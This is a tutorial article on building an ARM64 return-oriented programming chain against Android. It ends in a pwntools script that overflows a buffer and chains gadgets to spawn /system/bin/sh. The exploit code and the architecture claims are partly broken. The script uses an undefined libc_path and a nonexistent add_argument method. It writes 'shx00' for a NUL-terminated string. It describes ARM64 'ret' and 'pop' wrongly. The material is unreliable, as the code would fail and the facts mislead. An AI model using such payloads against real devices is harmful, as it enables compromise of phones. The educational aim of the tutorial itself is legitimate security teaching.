ROP Chain Crafting on Android ARM64: Bypassing NX and ASLR in Real-World Scenarios

Introduction to ROP on Android ARM64

Return-Oriented Programming (ROP) is a powerful exploit technique used to bypass modern exploit mitigations like No-Execute (NX) and Address Space Layout Randomization (ASLR). On Android ARM64 devices, these defenses are standard, making direct shellcode injection often impossible. ROP allows attackers to chain together small, existing code fragments (gadgets) from the legitimate program’s memory to execute arbitrary logic, often leading to a full compromise.

This article delves into the intricacies of crafting ROP chains specifically for the ARM64 architecture, focusing on the unique challenges and opportunities presented in the Android ecosystem. We’ll explore ARM64 calling conventions, gadget discovery, and construct a practical ROP chain to achieve code execution.

ARM64 Architecture and Calling Conventions

Understanding the ARM64 Application Binary Interface (ABI) is paramount for successful ROP chain development. Unlike 32-bit architectures, ARM64 uses a different set of registers for argument passing and return values.

General-Purpose Registers (X0-X30): 64-bit registers. X0-X7 are used to pass the first eight function arguments. Subsequent arguments are passed on the stack.
Link Register (LR/X30): Stores the return address for function calls. A ROP chain typically overwrites this.
Stack Pointer (SP): Points to the current top of the stack.
Frame Pointer (FP/X29): Used for stack frame management.
System Call Register (X8): When making system calls via the svc #0 instruction, the system call number is placed in X8. Arguments for the syscall are still passed in X0-X7.

ROP gadgets often end with instructions like ret (which means ldr x30, [sp], #0x10; ret on some ARM64 systems, or simply br x30 in others) or bl . The crucial aspect is that control flow is transferred to a register that we can control, typically X30 (LR).

Bypassing ASLR and NX with ROP

NX (No-Execute) prevents code execution from data segments, blocking direct shellcode injection into the stack or heap. ROP circumvents this by executing existing code in executable memory regions.

ASLR (Address Space Layout Randomization) randomizes the base addresses of libraries and the stack/heap, making it difficult to predict gadget addresses. To bypass ASLR, an information leak is typically required to reveal the base address of a loaded library (e.g., libc.so). Once a single address within an ASLR-protected module is known, all other addresses within that module can be calculated due to fixed offsets.

For the purpose of this tutorial, we will assume a base address for a relevant module (e.g., libc) has been successfully leaked, allowing us to accurately locate gadgets.

Gadget Discovery on ARM64

Gadgets are short sequences of instructions ending with a control flow transfer instruction (e.g., ret, br , blr ). Tools like ROPgadget are invaluable for finding these.

First, obtain the target binary or library (e.g., libc.so from an Android device). Then, use ROPgadget:

ROPgadget --binary /path/to/libc.so --arm64

This command will list all identified gadgets. We’ll be looking for gadgets that allow us to:

Load arbitrary values into registers (e.g., ldr x0, [sp, #0xX0] ; blr xY, or sequences like pop x0, x1, x2, ... ; ret if available).
Perform arithmetic or logical operations (less common for basic ROP, but useful for more complex chains).
Call system calls (e.g., svc #0).

Constructing an `execve` ROP Chain

Our goal is to execute execve("/system/bin/sh", NULL, NULL). On ARM64 Linux (Android’s underlying kernel), the execve system call number is 221 (0xDD).

The parameters for execve are:

x0: Pointer to the path string (e.g., "/system/bin/sh").
x1: Pointer to an array of argument strings (NULL for our simple case).
x2: Pointer to an array of environment strings (NULL for our simple case).
x8: System call number (221 for execve).

Step-by-Step ROP Chain Construction:

We need to find gadgets that help us populate these registers.

1. Prepare String Data: The string "/system/bin/shx00" must exist in memory, typically placed on the stack after the ROP chain itself, or in a known data segment.

2. Load "/system/bin/sh" into x0: We need a gadget that allows us to load a value from the stack into x0. A common pattern is:

0xDEADBEEF:   ldr x0, [sp, #0x10] ; ... ; blr xY

Or a series of pop-like instructions (e.g., ldp x0, x1, [sp], #0x10 ; ret). Let’s assume we find a gadget like pop {x0, x1, x2}, ret (simplified for clarity, more often it’s ldp x0, x1, [sp], #0x10; ldp x2, x3, [sp, #0x10]; ... ret). The ROP chain on the stack would then place the address of "/system/bin/sh" where x0 is popped from.

3. Load NULL into x1 and x2: Following the same logic, we’d need to pop 0x0 into x1 and x2. We can reuse the same type of gadget or find separate ones. Many useful gadgets end with a br , which takes the next gadget address from a controlled register.

4. Load System Call Number into x8: This is crucial. We need a gadget that moves a value from the stack into x8. A common gadget might look like:

0xCAFEFEED:   ldr x8, [sp, #0xX0] ; add sp, sp, #0xY0 ; blr xZ

Alternatively, a sequence like mov x8, xN ; blr xY where xN was previously loaded from the stack. The value 221 (or 0xDD) would be placed on the stack at the appropriate offset for this gadget.

5. Execute System Call: Finally, we need a gadget that performs the system call:

0xBADC0DE0:   svc #0 ; ret

Or simply svc #0 which will return control to the kernel. If a `ret` follows, it will take the next value from stack as a return address. We often want to exit cleanly or pivot to another stage here.

Example ROP Chain Layout (Conceptual Stack)

Assuming a buffer overflow allows us to overwrite the Link Register (LR) and control the stack:

[Stack Address]  [Content]                     [Purpose] 
SP + 0x00        Gadget_Pop_X0_X1_X2_ret_addr  (Address of the gadget to load x0, x1, x2)
SP + 0x08        Addr_of_String_sh             (Value for x0)
SP + 0x10        0x0                           (Value for x1)
SP + 0x18        0x0                           (Value for x2)
SP + 0x20        Gadget_Pop_X8_ret_addr        (Address of the gadget to load x8)
SP + 0x28        0xDD                          (Value for x8, SYS_execve)
SP + 0x30        Gadget_SVC_0_ret_addr         (Address of the svc #0 instruction)
SP + 0x38        Address_of_String_sh          (Repeated for convenience, or any subsequent payload)
...
[Some higher address] String_sh: "/system/bin/shx00"

This is a simplified representation. In a real scenario, stack alignment (16-byte for ARM64) must be maintained, and gadgets are rarely so perfectly aligned for `pop` operations. You might need to chain multiple smaller `ldr` or `add` gadgets, or find specific `ldp` (load pair) instructions to load multiple registers.

Practical Payload Construction (Python with Pwntools)

If you were exploiting this remotely, a Python script using pwntools would be ideal:

from pwn import *

# Assuming libc_base and gadget addresses are known (e.g., from an info leak)
libc_base = 0x7000000000 # Example base address

# Gadget offsets from libc_base (found via ROPgadget)
# Example gadgets - actual gadgets will vary
pop_x0_x1_x2_ret = libc_base + 0x123456  # Example: ldp x0, x1, [sp], #0x10; ldp x2, x3, [sp, #0x10]; blr xY
pop_x8_ret       = libc_base + 0x789ABC  # Example: ldr x8, [sp, #0xX0]; blr xY
svc_0            = libc_base + 0xDEF012  # Example: svc #0; ret

# Offset to our string on the stack relative to SP at chain start
# This needs careful calculation based on chain length and stack layout
sh_string_offset_from_sp = 0x40 # Example offset

# Construct the ROP chain
rop = b''

# First, put the string for execve after the ROP chain
# We'll calculate its address later assuming it's on the stack
sh_path = b"/system/bin/shx00"

# We need to compute the address of `sh_path` once it's on the stack. Let's assume the stack is controlled, 
# and we can place data after the ROP chain itself.
# If the ROP chain starts at 'initial_sp', then `sh_path` could be at `initial_sp + len(rop_chain)`

# Placeholder for the address of "/system/bin/sh". Will be filled after payload assembly.
addr_sh_path = 0xCCCCCCCCCCCCCC00 # This will be (initial_sp + offset_to_sh_path)

# Gadget to load x0, x1, x2
rop += p64(pop_x0_x1_x2_ret) 
rop += p64(addr_sh_path)      # x0 = "/system/bin/sh"
rop += p64(0x0)               # x1 = NULL
rop += p64(0x0)               # x2 = NULL

# Gadget to load x8 (syscall number)
rop += p64(pop_x8_ret)
rop += p64(221)               # x8 = SYS_execve (221)

# Gadget to execute the syscall
rop += p64(svc_0)

# If svc_0 has a 'ret', we need a dummy return address or a cleaner exit
# For simplicity, let's assume it exits to kernel or we want to clean up
# rop += p64(0x0) # Dummy return or an exit gadget

# Now append the string itself and update its address
full_payload = b'A'*56 # Fill buffer up to return address overwrite point
initial_sp_at_rop_start = 0xDEADBEEF # Placeholder for actual stack address

# Calculate where the sh_path string will be on the stack after the ROP chain
addr_sh_path_in_payload = initial_sp_at_rop_start + len(rop) + len(full_payload) # Assuming ROP follows fill

# Update the addr_sh_path in the rop chain (if dynamic, otherwise pre-calculate)
# For a real exploit, you'd construct the ROP chain bytes and then place sh_path correctly
# For this example, let's simplify and assume addr_sh_path is fixed.
# In pwntools, you could use ROP() object to manage addresses more cleanly.

# Let's rebuild ROP with a more robust pwn.ROP object for dynamic addresses
r = ROP(libc_path)
r.add_argument(addr_sh_path_in_payload) # For x0
r.add_argument(0) # For x1
r.add_argument(0) # For x2
r.raw(r.find_gadget(['mov x8, x?'])) # Find a mov x8, xN gadget
r.add_argument(221) # For x8 (sys_execve)
r.raw(svc_0)

rop_chain_bytes = r.chain()

final_payload = full_payload + rop_chain_bytes + sh_path

log.info(f"ROP chain length: {len(rop_chain_bytes)} bytes")
log.info(f"Full payload length: {len(final_payload)} bytes")
log.info(f"Shell path string will be at stack offset: {len(full_payload) + len(rop_chain_bytes)}")
log.info(f"Generated ROP chain: {rop_chain_bytes.hex()}")

Note: The addr_sh_path needs to point to the actual location of "/system/bin/sh" in memory. If you put it after the ROP chain on the stack, its address will be (initial_SP_of_ROP_chain + length_of_ROP_chain).

Conclusion

ROP chain crafting on Android ARM64 is a sophisticated technique essential for bypassing NX and ASLR. It requires a deep understanding of the ARM64 ABI, meticulous gadget discovery, and careful stack layout management. While the initial setup can be complex, mastering ROP unlocks the ability to achieve arbitrary code execution in scenarios where direct shellcode is blocked, paving the way for further exploitation or privilege escalation on modern Android devices.

Always remember that specific gadget addresses and even system call numbers can vary slightly between Android versions or custom ROMs, necessitating a targeted approach for each exploit.

Android Mobile Specs & Compare Directory

Are you researching mobile hardware properties, processor SoCs, GPU chipsets, or RAM configurations? Access our complete specs catalog to compare up to 5 devices side-by-side!

Compare Devices Specs →

Introduction to ROP on Android ARM64

ARM64 Architecture and Calling Conventions

Bypassing ASLR and NX with ROP

Gadget Discovery on ARM64

Constructing an execve ROP Chain

Step-by-Step ROP Chain Construction:

Example ROP Chain Layout (Conceptual Stack)

Practical Payload Construction (Python with Pwntools)

Conclusion

Android Mobile Specs & Compare Directory

Related Technical Guides

ROP Chain & ASLR Bypass: A Hands-On Tutorial for Android ARM64 Security

Beyond Binder Fuzzing: Manual & Semi-Automated Approaches for Deep IPC Vulnerability Discovery

Deep Dive: Android Kernel Memory Management & How UAF Exploits Bypass It

Constructing an `execve` ROP Chain